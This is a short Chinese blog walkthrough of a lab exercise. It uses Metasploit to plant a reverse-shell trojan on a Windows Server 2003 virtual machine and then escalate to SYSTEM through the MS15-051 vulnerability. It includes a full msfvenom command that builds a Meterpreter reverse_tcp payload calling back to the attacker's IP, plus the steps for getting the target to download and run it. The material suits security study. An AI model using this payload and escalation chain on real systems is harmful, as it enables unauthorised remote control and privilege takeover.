Metasploit利用ms15-051漏洞进行权限提权
实验环境
虚拟机:kali-linux(攻击机)
192.168.18.142
window server 2003(靶机)
192.168.18.146
工具:Metasploit
步骤:
1、生成木马文件:
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.18.142 lport=4444 -f exe -o /root/shell.exe
2、服务器网站目录上创建个shell文件夹,放置木马文件
复制到网站目录
3、使用handler模块
4.设置payload
5、exploit开始攻击,等待靶机木马连接
6.启动xampp服务(使靶机可以连上攻击机并运行木马文件)
7、切换到靶机访问 ”http://192.168.18.142/shell” 下载运行木马
8、攻击机成功获取到靶机的shell,使用 “getuid”查看为administrator权限
9、使用ms15-051漏洞,进一步获取system最高权限
10、设置payload,设置payload参数
11、输入“run”攻击成功,使用“getuid”查看已是system用户
12、提权成功
本站所有文章均为原创,欢迎转载,请注明文章出处: https://blog.csdn.net/weixin_43847838/article/details/115358473.。百度和各类采集站皆不可信,搜索请谨慎鉴别。技术类文章一般都有时效性,本人习惯不定期对自己的博文进行修正和更新,因此请访问出处以查看本文的最新版本。